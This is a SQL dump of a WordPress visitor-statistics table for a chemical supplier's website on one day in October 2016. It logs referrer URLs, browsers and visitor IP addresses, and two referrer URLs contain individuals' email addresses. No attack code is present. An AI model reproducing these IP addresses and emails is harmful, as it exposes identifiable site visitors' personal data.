INSERT INTO `wp_statistics_visitor` VALUES (3118, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '14.36.156.26', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3119, '2016-10-12', 'https://www.google.co.uk/', 'Chrome', 'Windows', '53.0.2785.143', '', '81.151.9.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3120, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '50.0.2661.102', '', '210.184.172.251', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3121, '2016-10-12', 'https://www.google.co.in/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&cad=rja&uact=8&ved=0ahUKEwj63PXU9dTPAhXK0RoKHX6jDC0QFghPMAk&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fvazo%2F&usg=AFQjCNHY9PYcotxzZs4ETcH5s9OXED1qqw&bvm=bv.135475266,d.d2s', 'MSIE', 'Windows', '11.0', '', '150.107.233.83', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3122, '2016-10-12', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '180.255.242.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3123, '2016-10-12', 'https://www.bing.com/search?&q=Gases%20%20Chemicals%20&%20Medical%20Equipment%20sales%20companies%20in%20oman%20mail&scope=web&setmkt=en-xa&setlang=match&first=481', 'MSIE', 'Windows', '11.0', '', '197.211.57.102', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3124, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '118.212.114.142', '000', 53, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3125, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.30.95.162', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3126, '2016-10-12', 'https://globalwits.globalsou.com/crawl/searchResult.asp?id=55922', 'Chrome', 'Windows', '45.0.2454.101', '', '27.223.28.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3127, '2016-10-12', 'https://rada.ru/souvenir/', 'Opera', 'Windows', '9.00', '', '46.118.118.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3128, '2016-10-12', 'https://www.google.com.sg/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwiklcyh_NTPAhUF1BoKHSnmAdMQFggaMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.d2s', 'MSIE', 'Windows', '11.0', '', '116.12.161.98', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3129, '2016-10-12', 'https://www.google.co.uk/', 'Chrome', 'Windows', '53.0.2785.116', '', '77.86.53.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3130, '2016-10-12', 'https://www.google.ro/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&cad=rja&uact=8&sqi=2&ved=0ahUKEwjflZT98NTPAhULchQKHdnID80QFggyMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-205%2F&usg=AFQjCNHwZ2VkQ2EkLZn-9yjL6I2BINcdgA&bvm=bv.135475266,d.bGg', 'MSIE', 'Windows', '11.0', '', '82.78.136.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3131, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '45.55.229.101', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3132, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '28.0', '', '45.55.229.101', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3133, '2016-10-12', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '7.0.3', '', '45.55.229.101', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3134, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '35.0.1916.114', '', '45.55.229.101', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3135, '2016-10-12', 'https://www.miller-stephenson.com/index.html', 'Chrome', 'Windows', '34.0.1847.131', '', '45.55.229.101', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3136, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3137, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.157', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3138, '2016-10-12', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwj5yqjX_tTPAhUGrRoKHScoCrMQFggwMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-105%2F&usg=AFQjCNE7fDUZYvw1vi_-WJ_5lLxrv9GE4g&sig2=GTs_o53qyaDsEmCQI8LfeQ&bvm=bv.135475266,d.d2s', 'MSIE', 'Windows', '11.0', '', '217.89.113.14', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3139, '2016-10-12', 'https://www.miller-stephenson.com/', 'BlackBerry7520', 'Unknown', '4.0.0', '', '104.193.10.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3140, '2016-10-12', 'https://www.miller-stephenson.com/', 'Unknown', 'Unknown', 'Unknown', '', '104.193.10.66', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3141, '2016-10-12', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '5.11', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3142, '2016-10-12', 'https://www.miller-stephenson.com/', 'version', 'Unknown', '0.41', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3143, '2016-10-12', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '104.193.10.66', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3144, '2016-10-12', 'https://www.miller-stephenson.com/', 'W3CLineMode', 'Unknown', '5.4.0', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3145, '2016-10-12', 'https://www.miller-stephenson.com/', 'Java1', 'Unknown', 'Unknown', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3146, '2016-10-12', 'https://www.miller-stephenson.com/', 'MovableType', 'Unknown', 'x.x', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3147, '2016-10-12', 'https://www.miller-stephenson.com/', 'eCatch', 'Unknown', '3.0', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3148, '2016-10-12', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '5.12', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3149, '2016-10-12', 'https://www.miller-stephenson.com/', 'MSIE', 'Unknown', '4.0', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3150, '2016-10-12', 'https://www.miller-stephenson.com/', 'JoBo', 'Unknown', 'Unknown', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3151, '2016-10-12', 'https://www.miller-stephenson.com/', 'JOC', 'Unknown', 'Unknown', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3152, '2016-10-12', 'https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent', 'SiteWinder', 'Unknown', 'Unknown', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3153, '2016-10-12', 'https://www.miller-stephenson.com/chemicals/vazo/', 'MSIE', 'Windows', '5.5', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3154, '2016-10-12', 'https://www.miller-stephenson.com/', '1st', 'Unknown', 'Unknown', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3155, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.175', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3156, '2016-10-12', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.178', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3157, '2016-10-12', 'https://www.google.bg/', 'Chrome', 'Linux', '43.0.2357.81', '', '62.176.115.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3158, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '213.189.136.90', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3159, '2016-10-12', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjhuP3ngtXPAhWLAcAKHfZSAOkQFghuMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Frelease_agents.html&usg=AFQjCNEtml3Wnf9B2NvctrDFppdhnpqPXA&sig2=JON02pcx_SzqJ6UaYtSlqA', 'MSIE', 'Windows', '11.0', '', '193.34.187.245', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3160, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.70.245.108', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3161, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.200', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3162, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.64', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3163, '2016-10-12', 'https://www.google.es/', 'Chrome', 'Windows', '53.0.2785.143', '', '77.228.229.16', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3164, '2016-10-12', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '115.115.183.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3165, '2016-10-12', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '117.247.177.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3166, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '213.189.136.90', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3167, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3168, '2016-10-12', 'https://www.bing.com/search?q=miller+stephenson+chemical&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '131.137.245.208', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3169, '2016-10-12', 'https://www.google.com.tr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0ahUKEwjv3riMjdXPAhXkBcAKHbopDXQQFghQMAY&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-240ac%2F&usg=AFQjCNGMGT-9sDD56bUfjS2_Mysw8RHfIA&sig2=lKN1dYLbUFLi3ZduC1KNBg&bvm=bv.135475266,d.d24', 'MSIE', 'Windows', '11.0', '', '195.175.90.2', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3170, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3171, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3172, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.67.128.81', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3173, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '176.9.74.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3174, '2016-10-12', 'https://kazus.ru/forums/showthread.php?t=58915', 'Firefox', 'Windows', '47.0', '', '89.21.95.163', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3175, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '46.0', '', '109.205.5.17', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3176, '2016-10-12', 'https://forum.guns.ru/forummessage/15/091409-4.html', 'Chrome', 'Windows', '53.0.2785.143', '', '89.113.10.214', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3177, '2016-10-12', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '109.188.73.229', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3178, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.199.8.19', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3179, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.67.159.137', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3180, '2016-10-12', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '193.254.35.188', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3181, '2016-10-12', 'https://www.google.nl/', 'Chrome', 'Windows', '53.0.2785.143', '', '159.100.70.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3182, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '43.0.2357.81', '', '213.189.136.90', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3183, '2016-10-12', 'https://www.google.ru/', 'Firefox', 'Windows', '49.0', '', '31.181.253.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3184, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '50.177.208.210', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3185, '2016-10-12', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.35.72.111', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3186, '2016-10-12', 'https://www.google.com/', 'Firefox', 'Windows', '48.0', '', '158.129.160.170', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3187, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.67.128.141', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3188, '2016-10-12', 'https://chemicalengineering.hotims.com/r5/search.asp?return_by_category=y&action=search-eresp&s_type=&pub_id=224&order_by=&rows_per_page=1000&mc=ChemEng_October2016&email=fike%40bulkchemicals.us&eresponse=1&category_id=52039&category_id=52041&category_id=52028&category_id=52038&category_id=52036&category_id=52029', 'Chrome', 'Windows', '53.0.2785.143', '', '75.146.233.145', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3189, '2016-10-12', 'https://mmk.mschem.com/miller/pdf/MS-907.pdf', 'Chrome', 'Windows', '53.0.2785.143', '', '71.174.98.70', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3190, '2016-10-12', 'https://m.facebook.com', 'AppleWebKit', 'iPhone', '602.1.50', '', '104.12.88.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3191, '2016-10-12', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0ahUKEwiC95O0oNXPAhVJfiYKHePeDG0QFgg9MAY&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepikure-w%2F&usg=AFQjCNHEXqhjk-N_pRnZi-f1vbzhvmYcwA&bvm=bv.135475266,d.eWE', 'MSIE', 'Windows', '11.0', '', '24.196.193.74', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3192, '2016-10-12', 'https://www.google.com.sg/', 'Safari', 'iPhone', '10.0', '', '42.60.13.238', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3193, '2016-10-12', 'https://vremya.eu/stati/zdorove-i-medicina/kosmetologicheskii-centr-yeterija-odessa.html', 'MSIE', 'Windows', '6.0', '', '37.115.187.108', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3194, '2016-10-12', 'https://www.google.com/', 'Firefox', 'Windows', '1.0.2', '', '104.222.47.161', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3195, '2016-10-12', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiTleqso9XPAhVQOoEKHd52Dl8YABAA&sig=AOD64_2BLml4v9K5Ifa5YWMzwDFgLMruQQ&rct=j&q=&ved=0ahUKEwi1peaso9XPAhWBeSYKHZ1gDZEQ0QwIXQ&adurl=', 'MSIE', 'Windows', '11.0', '', '72.23.167.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3196, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '4.0', '', '107.170.107.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3197, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.150.252', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3198, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3199, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '72.234.9.118', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3200, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '108.255.88.102', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3201, '2016-10-12', 'https://www.google.ch/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwicvobXpdXPAhUDuBoKHUdtCSEQFggmMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-111-epoxy-stripping-agent%2F&usg=AFQjCNFQwRFTtPon2Qqwmei8CXX9dl913g', 'MSIE', 'Windows', '11.0', '', '85.2.214.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3202, '2016-10-12', 'https://www.google.ch/', 'Firefox', 'Windows', '49.0', '', '81.6.56.104', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3203, '2016-10-12', 'https://avtolombard-krasnodar.ru/', 'Opera', 'Windows', '9.01', '', '37.115.187.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3204, '2016-10-12', 'https://www.google.ch/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj_45qZqNXPAhWFuRQKHWmOBRoQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-111-epoxy-stripping-agent%2F&usg=AFQjCNFQwRFTtPon2Qqwmei8CXX9dl913g&bvm=bv.135475266,d.bGs', 'MSIE', 'Windows', '11.0', '', '85.4.92.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3205, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '112.99.74.84', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3206, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.53.208.196', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3207, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '114.55.151.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3208, '2016-10-12', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '10.10', '', '79.3.69.168', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3209, '2016-10-12', 'https://chemicalengineering.hotims.com/r5/search.asp?return_by_category=y&action=search-eresp&s_type=&pub_id=224&order_by=&rows_per_page=1000&mc=ChemEng_October2016&email=ALEJANDRO.LAGGER%40fibertel.com.ar&eresponse=1&category_id=52041&category_id=52040&category_id=52028', 'Chrome', 'Windows', '53.0.2785.143', '', '181.229.113.164', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3210, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.198.243.204', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3211, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '12.40.148.10', '000', 24, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3212, '2016-10-12', 'https://m.facebook.com/', 'Chrome', 'Android', '53.0.2785.124', '', '172.115.227.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3213, '2016-10-12', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '174.47.212.222', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3214, '2016-10-12', 'https://www.miller-stephenson.com/articles/', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3215, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '206.186.133.226', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3216, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.140', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3217, '2016-10-12', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '53.0.2785.143', '', '50.151.36.144', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3218, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '32.217.41.99', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3219, '2016-10-12', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi8vZiusdXPAhUQHYEKHbGcDAoYABAI&sig=AOD64_1834qvdRLBzBsvfAnGtSVOl234mA&ctype=4&rct=j&q=&ved=0ahUKEwj93JOusdXPAhVCPT4KHcERAikQpigILigC&adurl=', 'MSIE', 'Windows', '11.0', '', '68.235.104.2', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3220, '2016-10-12', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '64.26.151.130', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3221, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3222, '2016-10-12', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.3', '', '107.221.66.184', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3223, '2016-10-12', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwjg98LWs9XPAhXHilQKHSyGDxoQFgg4MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-826%2F&usg=AFQjCNHj0G0zfOGbw4615b838lZaXvqHvA', 'MSIE', 'Windows', '11.0', '', '209.36.36.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3224, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '12.10.86.108', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3225, '2016-10-12', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '23.25.145.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3226, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.41.60.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3227, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.45.193.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3228, '2016-10-12', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '98.237.152.127', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3229, '2016-10-12', 'https://www.miller-stephenson.com', 'Safari', 'Unknown', '602.1', '', '98.237.152.127', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3230, '2016-10-12', 'https://www.miller-stephenson.com/miller/conformal_coating.html', 'Chrome', 'Windows', '49.0.2623.112', '', '66.226.207.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3231, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.249.88.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3232, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.249.88.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3233, '2016-10-12', 'https://mmr.mschem.com/miller/pdf/Heloxy.pdf', 'Chrome', 'Windows', '53.0.2785.143', '', '64.211.7.98', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3234, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '65.30.200.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3235, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '65.69.80.190', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3236, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '208.85.193.19', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3237, '2016-10-12', 'https://www.miller-stephenson.com/miller/media_head_plastic_cleaners.html', 'MSIE', 'Windows', '9.0', '', '182.118.20.254', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3238, '2016-10-12', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '75.19.5.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3239, '2016-10-12', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjg4eCAutXPAhVOG4EKHWnnBq0YABAA&sig=AOD64_2gkzc6DxTQ6wxYEFUhWZOfvnv28A&rct=j&q=&ved=0ahUKEwiy8NyAutXPAhWBKyYKHY35COoQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '132.3.41.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3240, '2016-10-12', 'https://www.miller-stephenson.com/notify-SubZero?aHR0cDovL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb20vY2hlbWljYWxzL2tyeXRveC10cmlib3N5cy1maW5pc2gtbGluZS9rcnl0b3gtbHVicmljYW50cy8/Z2NsaWQ9Q0pfV2lKYTYxYzhDRlZBMmdRb2RfS2NJbkE=;yvgR8sBAdkkIuGIwJvmTog3bZN1s76SS1Js3rN3sLiU=', 'MSIE', 'Windows', '11.0', '', '132.3.41.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3241, '2016-10-12', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/krytox-lubricants/?gclid=CJ_WiJa61c8CFVA2gQod_KcInA', 'MSIE', 'Windows', '11.0', '', '132.3.41.78', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3242, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.203.185.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3243, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.112.193.149', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3244, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.162.240.129', '000', 20, 0); 
